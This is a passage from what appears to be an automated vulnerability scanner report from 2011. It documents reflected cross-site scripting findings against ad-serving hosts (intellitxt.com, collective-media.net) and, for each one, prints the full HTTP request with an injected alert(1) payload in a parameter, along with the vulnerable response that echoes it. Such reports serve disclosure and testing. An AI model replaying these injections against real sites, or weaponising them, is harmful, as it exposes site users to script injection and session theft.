GET /v4/init?ts=1304957904084&pagecl=22453&fv=10&muid=&refurl=http%3A%2F%2F247wallst.com%2F2011%2F05%2F06%2Fanticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg%2F&ipid=8372&jscallback=$iTXT.js.callback044f03%3balert(1)//58d44a91433 HTTP/1.1
Host: 247wallstreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:21:17 GMT
Age: 0
Connection: keep-alive
Content-Length: 6753

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback044f03;alert(1)//58d44a91433({"requiresContextualization":1,"requiresAdverts":1,"chunkKey":"8372:8bccb8904d8af05accfc58ac1e54f475:0ACD3C408E1D4BD0AFE6846EDF453A92:"});}catch(e){}

2.5. http://247wallstreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://247wallstreet.us.intellitxt.com
Path:	/v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e5ea"-alert(1)-"6f56b0c2ac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /v4/init?ts=1304957904084&pagecl=22453&fv=10&muid=&refurl=http%3A%2F%2F247wallst.com%2F2011%2F05%2F06%2Fanticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg%2F&ipid=8372&jscallback=$iTXT.js.callback0&5e5ea"-alert(1)-"6f56b0c2ac5=1 HTTP/1.1
Host: 247wallstreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm-rf-key-bpop-ire-aib-nbg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwYAAAEv1Y1e4AA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 16:21:21 GMT
Age: 0
Connection: keep-alive
Content-Length: 6734

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
,"dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24","REGIONNAME":"Texas","muid":"","city":"Dallas","5e5ea"-alert(1)-"6f56b0c2ac5":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://247wallst.com/2011/05/06/anticipating-the-citigroup-reverse-stock-split-trading-implications-are-major-and-many-c-aig-nyx-bac-wfc-jpm
...[SNIP]...

2.6. http://a.collective-media.net/adj/cm.quadhearst/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadhearst/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2229'-alert(1)-'4476ee9bf82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadhearsta2229'-alert(1)-'4476ee9bf82/;sz=300x250;click0=;ord=1304957833? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 442
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.quadhearsta2229'-alert(1)-'4476ee9bf82/;sz=300x250;net=cm;ord=1304957833;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.7. http://a.collective-media.net/adj/cm.quadhearst/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadhearst/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fed05'-alert(1)-'79336fe6bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadhearst/;sz=300x250;click0=;ord=1304957833?&fed05'-alert(1)-'79336fe6bb2=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Mon, 09 May 2011 16:17:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.quadhearst/;sz=300x250;net=cm;ord=1304957833?&fed05'-alert(1)-'79336fe6bb2=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.8. http://a.collective-media.net/adj/cm.quadhearst/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/cm.quadhearst/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a3be'-alert(1)-'bfa42a13362 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/cm.quadhearst/;sz=300x250;click0=;ord=1304957833?7a3be'-alert(1)-'bfa42a13362 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/300x250/ht_657020_29767596?t=1304957831887&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.sfgate.com%2Fcgi-bin%2Farticle.cgi%3Ff%3D%2Fg%2Fa%2F2011%2F05%2F08%2Fbloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Mon, 09 May 2011 16:17:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.quadhearst/;sz=300x250;net=cm;ord=1304957833?7a3be'-alert(1)-'bfa42a13362;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.9. http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.sanfrancisco/be_bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a932'-alert(1)-'b74eb0ba95b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.sanfrancisco8a932'-alert(1)-'b74eb0ba95b/be_bus;sz=300x250;ord=1412414579? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.sanfrancisco8a932'-alert(1)-'b74eb0ba95b/be_bus;sz=300x250;net=q1;ord=1412414579;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.10. http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.sanfrancisco/be_bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36c6b'-alert(1)-'609b440c65f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.sanfrancisco/be_bus36c6b'-alert(1)-'609b440c65f;sz=300x250;ord=1412414579? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 09 May 2011 16:17:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:19 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus36c6b'-alert(1)-'609b440c65f;sz=300x250;net=q1;ord=1412414579;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.11. http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.sanfrancisco/be_bus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3b5'-alert(1)-'a3827620b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.sanfrancisco/be_bus;sz=300x250;ord=1412414579?&3c3b5'-alert(1)-'a3827620b=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Date: Mon, 09 May 2011 16:17:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus;sz=300x250;net=q1;ord=1412414579?&3c3b5'-alert(1)-'a3827620b=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.12. http://a.collective-media.net/adj/q1.q.sanfrancisco/be_bus [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.q.sanfrancisco/be_bus

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e4ed'-alert(1)-'a0b73b6e0b4 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.q.sanfrancisco/be_bus;sz=300x250;ord=1412414579?5e4ed'-alert(1)-'a0b73b6e0b4 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Mon, 09 May 2011 16:17:18 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.q.sanfrancisco/be_bus;sz=300x250;net=q1;ord=1412414579?5e4ed'-alert(1)-'a0b73b6e0b4;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.13. http://a.collective-media.net/adj/q1.sanfrancisco/bus [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.sanfrancisco/bus

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b783'-alert(1)-'4e9e826b1bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.sanfrancisco5b783'-alert(1)-'4e9e826b1bc/bus;sz=300x250;click0=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGZjdGRkZyhnaWQkYmZjOTdhOGUtN2E1Ny0xMWUwLThmNWUtOWZmMjI5MzM4NzE4LHN0JDEzMDQ5NTc4MTE5NTAzMjIsc2kkMjEzNTUxLHYkMS4wLGFpZCRCSnVBTzB3Tmlacy0sY3QkMjUseWJ4JDVkOGpRR3FGN1pwaVBZZk1XSzVIaVEsciQwKSk/1/*;ord=1304957812.967? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 09 May 2011 16:17:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sanfrancisco5b783'-alert(1)-'4e9e826b1bc/bus;sz=300x250;net=q1;ord=1304957812.967;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.14. http://a.collective-media.net/adj/q1.sanfrancisco/bus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.sanfrancisco/bus

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e70e4'-alert(1)-'c7d21a40d31 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.sanfrancisco/buse70e4'-alert(1)-'c7d21a40d31;sz=300x250;click0=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGZjdGRkZyhnaWQkYmZjOTdhOGUtN2E1Ny0xMWUwLThmNWUtOWZmMjI5MzM4NzE4LHN0JDEzMDQ5NTc4MTE5NTAzMjIsc2kkMjEzNTUxLHYkMS4wLGFpZCRCSnVBTzB3Tmlacy0sY3QkMjUseWJ4JDVkOGpRR3FGN1pwaVBZZk1XSzVIaVEsciQwKSk/1/*;ord=1304957812.967? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.sfgate.com/cgi-bin/article.cgi?f=/g/a/2011/05/08/bloomberg1376-LKWYZF6S972G01-5U2F4H9B4Q540L3322OU7K5SKS.DTL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; apnx=1; qcms=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; brlg=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 09 May 2011 16:17:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 08-Jun-2011 16:17:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/q1.sanfrancisco/buse70e4'-alert(1)-'c7d21a40d31;sz=300x250;net=q1;ord=1304957812.967;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

2.15. http://a.collective-media.net/adj/q1.sanfrancisco/bus [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/q1.sanfrancisco/bus

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e88ce'-alert(1)-'d0280cefb14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/q1.sanfrancisco/bus;sz=300x250;click0=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NGZjdGRkZyhnaWQkYmZjOTdhOGUtN2E1Ny0xMWUwLThmNWUtOWZmMjI5MzM4NzE4LHN0JDEzMDQ5NTc4MTE5NTAzMjIsc2kkMjEzNTUxLHYkMS4wLGFpZCRCSnVBTzB3Tmlacy0sY3QkMjUseWJ4JDVkOGpRR3FGN1pwaVBZZk1XSzVIaVEsciQwKSk/1/*;ord=1304957812.967?&e88ce'-alert(1)-'d0280cefb14=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
